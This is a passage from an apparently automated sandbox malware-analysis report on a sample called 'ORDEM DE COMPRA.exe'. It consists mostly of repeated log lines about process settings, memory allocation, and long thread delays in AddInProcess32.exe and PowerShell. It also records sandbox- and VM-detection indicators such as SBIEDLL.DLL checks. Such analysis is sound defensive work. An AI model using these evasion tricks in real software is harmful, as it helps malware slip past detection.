              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory allocated: 1FBD9590000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeMemory allocated: 1FBF1710000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599529Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598316Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597134Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595016Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594780Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594344Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 7640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2198Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -32281802128991695s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5056Thread sleep count: 7640 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5056Thread sleep count: 2198 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599529s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599203s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598984s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598316s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598187s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -598078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597134s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -597008s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596906s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596797s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596687s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596577s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596469s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596234s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596125s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -596015s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595906s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595797s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595687s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595578s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595469s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595359s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595250s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595141s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -595016s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594780s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5096Thread sleep time: -594344s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599529Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598316Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597134Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595687Jump to behavior
